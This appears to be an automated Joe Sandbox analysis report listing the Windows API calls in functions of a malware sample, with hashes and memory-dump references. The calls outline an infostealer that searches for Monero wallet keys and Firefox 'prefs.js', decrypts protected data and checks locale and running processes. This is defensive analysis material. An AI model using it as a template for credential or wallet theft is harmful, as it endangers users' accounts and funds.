                        • Opcode Fuzzy Hash: 939479ca269bf6dd25e9fbefd0c8a9710d1daf3d1b62ef8c53d8dc17d00410dc
                        • Instruction Fuzzy Hash: AE5152B1540219ABCB28EB70DC89FFE777CBF58300F408599B65992190EB74DB858F92
                        APIs
                        • wsprintfA.USER32 ref: 005F3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F3EDA
                        • StrCmpCA.SHLWAPI(?,00600FAC), ref: 005F3F08
                        • StrCmpCA.SHLWAPI(?,00600FB0), ref: 005F3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F406C
                        • FindClose.KERNEL32(000000FF), ref: 005F4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 6a654a2e2226ffa4bb7ce2e332899af7b2d54de540f95fc6b11efe82942a98e3
                        • Instruction ID: 28d16742fe7c58f114657075923dcd755c6bcbed3b25edfde60923dc7f850b1c
                        • Opcode Fuzzy Hash: 6a654a2e2226ffa4bb7ce2e332899af7b2d54de540f95fc6b11efe82942a98e3
                        • Instruction Fuzzy Hash: 005147B5900219ABCB28EBB0DC49EFA777CBF84300F008598B75996080DB75DB86CF55
                        APIs
                        • wsprintfA.USER32 ref: 005EED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 005EED55
                        • StrCmpCA.SHLWAPI(?,00601538), ref: 005EEDAB
                        • StrCmpCA.SHLWAPI(?,0060153C), ref: 005EEDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EF2AE
                        • FindClose.KERNEL32(000000FF), ref: 005EF2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 709c15dbb542f9422c0a0bc3d13963e5e46ef5fe5bb0c15e86d2b884cc1f7a9a
                        • Instruction ID: 7300d1ec06c52c914fdbea599d0cac0337f291163ef7fcf24a3dd229c2ce2a92
                        • Opcode Fuzzy Hash: 709c15dbb542f9422c0a0bc3d13963e5e46ef5fe5bb0c15e86d2b884cc1f7a9a
                        • Instruction Fuzzy Hash: AAE104B291111D5ADB18FB60CC56EFE7738BF94340F4041A9B60E62096EE746B8ACF53
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006015B8,00600D96), ref: 005EF71E
                        • StrCmpCA.SHLWAPI(?,006015BC), ref: 005EF76F
                        • StrCmpCA.SHLWAPI(?,006015C0), ref: 005EF785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EFAB1
                        • FindClose.KERNEL32(000000FF), ref: 005EFAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 99857282c4398f9ef4065e4870ae99de1eb15a0974a5845885be10dabf2135d3
                        • Instruction ID: efae9169459db099594bda3b036aded09b79d4df5b96010c21231d804b678350
                        • Opcode Fuzzy Hash: 99857282c4398f9ef4065e4870ae99de1eb15a0974a5845885be10dabf2135d3
                        • Instruction Fuzzy Hash: A4B153B19001099BCB28FF60DC59EFE7B79BF94300F0085A8A54E97195EF746B49CB92
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0060510C,?,?,?,006051B4,?,?,00000000,?,00000000), ref: 005E1923
                        • StrCmpCA.SHLWAPI(?,0060525C), ref: 005E1973
                        • StrCmpCA.SHLWAPI(?,00605304), ref: 005E1989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005E1D40
                        • DeleteFileA.KERNEL32(00000000), ref: 005E1DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005E1E20
                        • FindClose.KERNEL32(000000FF), ref: 005E1E32
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 15dc8141cb1268934695cc29b22e99014600b8dea61aa6e8325d33a56cd40a1d
                        • Instruction ID: bf585e4146703514f06c96f392773186064cc0964cd3d23931e6b0336055c238
                        • Opcode Fuzzy Hash: 15dc8141cb1268934695cc29b22e99014600b8dea61aa6e8325d33a56cd40a1d
                        • Instruction Fuzzy Hash: 131212B191011D9BCB19EB60CC59AFE7778BF94340F4041A9A60E62095EF746F89CF92
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00600C2E), ref: 005EDE5E
                        • StrCmpCA.SHLWAPI(?,006014C8), ref: 005EDEAE
                        • StrCmpCA.SHLWAPI(?,006014CC), ref: 005EDEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EE3E0
                        • FindClose.KERNEL32(000000FF), ref: 005EE3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: acad5b0e4907cdd513c344117d5cf3936c25585c25e3056620cf88bf19f76b8b
                        • Instruction ID: e9ed3dc115a9ddf0c181778c56f30f73d3749a4c93095122ba2ca551e05dba3b
                        • Opcode Fuzzy Hash: acad5b0e4907cdd513c344117d5cf3936c25585c25e3056620cf88bf19f76b8b
                        • Instruction Fuzzy Hash: C6F1CFB181011E9ADB19EB60CC99EFE7778BF94340F4041A9A50E62095EF746B4ACF52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *cz#$H3W$J:tN$SMs?$aBr3$gw7}$jr$o*v$~\)Q$6z
                        • API String ID: 0-3346293091
                        • Opcode ID: 479a4afa9d8421a3f9714527aefb7799679ae6246f5b592130a1a95c1df80ede
                        • Instruction ID: 3c386dcbfdc7fd36a15b99458b183da9a0ed96c3b4768c043a1696ef24f100fa
                        • Opcode Fuzzy Hash: 479a4afa9d8421a3f9714527aefb7799679ae6246f5b592130a1a95c1df80ede
                        • Instruction Fuzzy Hash: 56B218F360C204AFE304AE29EC8577AFBE5EFD4720F1A853DE6C487744EA3558018696
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006014B0,00600C2A), ref: 005EDAEB
                        • StrCmpCA.SHLWAPI(?,006014B4), ref: 005EDB33
                        • StrCmpCA.SHLWAPI(?,006014B8), ref: 005EDB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EDDCC
                        • FindClose.KERNEL32(000000FF), ref: 005EDDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 28fda33163167a47323b32c3a1f0deeded45e36a1541ee6a99782b864d6776d1
                        • Instruction ID: 2cfd2dd32ee4db3a82aefeda7afc0bc8da87a4a0c8f86481bc325627af71a798
                        • Opcode Fuzzy Hash: 28fda33163167a47323b32c3a1f0deeded45e36a1541ee6a99782b864d6776d1
                        • Instruction Fuzzy Hash: 649156B290010997CB18FB70DC5ADFD7B7DBFC4340F408568B94A96195EE78AB098B93
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,006005AF), ref: 005F7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005F7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 005F7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 005F7C62
                        • LocalFree.KERNEL32(00000000), ref: 005F7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 9bcd91c277da76ec1641dc70cfd023347d5b212adaf68aa9c0f47f15d27fc356
                        • Instruction ID: 21764e7ee612722b90f415abc63396f13ce2ac788d2fd53792e62eb604e3b59a
                        • Opcode Fuzzy Hash: 9bcd91c277da76ec1641dc70cfd023347d5b212adaf68aa9c0f47f15d27fc356
                        • Instruction Fuzzy Hash: 0C415EB194011DABDB24DB54DC99BFEBB74FF48700F204199E609A2191DB782F85CFA2
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00600D73), ref: 005EE4A2
                        • StrCmpCA.SHLWAPI(?,006014F8), ref: 005EE4F2
                        • StrCmpCA.SHLWAPI(?,006014FC), ref: 005EE508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EEBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: b69f3cf6524d3f439e670d90c00a24a8c38eb02d060142fe32d80c204105dfeb
                        • Instruction ID: 0728db3486261cff9a258997ae2cafecd7d584ec107a338bff12bb15918c0e56
                        • Opcode Fuzzy Hash: b69f3cf6524d3f439e670d90c00a24a8c38eb02d060142fe32d80c204105dfeb
                        • Instruction Fuzzy Hash: 401272B191010E9ADB18FB60DC9AEFD7738BF94340F4041A8B60E56095EE786F49CB93
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &k&^$=Uo$?LnO$Czm]$ME?$O^y/
                        • API String ID: 0-1676352826
                        • Opcode ID: 9dcc2760106a0574b606cf9974cd0594e83780d46e8159626a633a53a133bc95
                        • Instruction ID: 7b814b64ab3ed4321a7e052861167d2ed9ca2b0a22f6b721a04d74372ae0cd91
                        • Opcode Fuzzy Hash: 9dcc2760106a0574b606cf9974cd0594e83780d46e8159626a633a53a133bc95
                        • Instruction Fuzzy Hash: 9FB24AF390C2109FE3086E2DEC8567ABBE5EF94720F164A3DEAC5D3744EA3558018697
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,005E4EEE,00000000,?), ref: 005E9B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9B2A
                        • LocalFree.KERNEL32(?,?,?,?,005E4EEE,00000000,?), ref: 005E9B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N^
                        • API String ID: 4291131564-102271716
                        • Opcode ID: 71a2ba0f41ab36c1d0d4b95adf8124869537ed176536a41e1731ed66e0d426e8
                        • Instruction ID: 10d277b7304c482eab99587b46fe0351a30776a1eaa98b4a65f11b21e998a4b8
                        • Opcode Fuzzy Hash: 71a2ba0f41ab36c1d0d4b95adf8124869537ed176536a41e1731ed66e0d426e8
                        • Instruction Fuzzy Hash: E111A2B4240208BFEB14CF64DC95FAA77B9FB89700F208058FA159B390C7B6A941CB90
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005EC871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005EC87C
                        • lstrcat.KERNEL32(?,00600B46), ref: 005EC943
                        • lstrcat.KERNEL32(?,00600B47), ref: 005EC957
                        • lstrcat.KERNEL32(?,00600B4E), ref: 005EC978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 6545640befff87e0e9e4949112d4c90b824e1217dc6b35a431bacf1f37ba424d
                        • Instruction ID: 6f9e5f0cb5138bbf5b48af152cfe9a6088dcc63a7de00267f3a139dc534cb04f
                        • Opcode Fuzzy Hash: 6545640befff87e0e9e4949112d4c90b824e1217dc6b35a431bacf1f37ba424d
                        • Instruction Fuzzy Hash: 3B41737590421AEFDB14CFA0DC89BEEBBB8BF44304F1045A8E509A6280D7749A85CF91
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 005F696C
                        • sscanf.NTDLL ref: 005F6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005F69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005F69C0
                        • ExitProcess.KERNEL32 ref: 005F69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 4ddcf7b599673e4a581226aaa72372481e8ecb3c501fa4a2958b9e660f0a2180
                        • Instruction ID: 455c131e5be6d8e57011c4591576bf2ad289e13d9fc5397592bfa57ef776d5ea
                        • Opcode Fuzzy Hash: 4ddcf7b599673e4a581226aaa72372481e8ecb3c501fa4a2958b9e660f0a2180
                        • Instruction Fuzzy Hash: 9221EAB5D1020DABCF08EFE4D9459EEBBB5FF48300F04852AE506E3254EB749605CB69
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 005E724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E7254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005E7281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005E72A4
                        • LocalFree.KERNEL32(?), ref: 005E72AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 8589eca7077af2a24f645c16bd4c53cc1b35754de6b79fb41617d3b908efbf04
                        • Instruction ID: 0b97bbcdecdffa895209d3cb24f1d49399da1fcef0fd739492ca180dbf351fb1
                        • Opcode Fuzzy Hash: 8589eca7077af2a24f645c16bd4c53cc1b35754de6b79fb41617d3b908efbf04
                        • Instruction Fuzzy Hash: DB010075A40208BBEB28DFD4DD46F9E7BB9BF44700F108555FB05AA2C0D770AA018B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005F961E
                        • Process32First.KERNEL32(00600ACA,00000128), ref: 005F9632
                        • Process32Next.KERNEL32(00600ACA,00000128), ref: 005F9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 005F965C
                        • CloseHandle.KERNEL32(00600ACA), ref: 005F967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
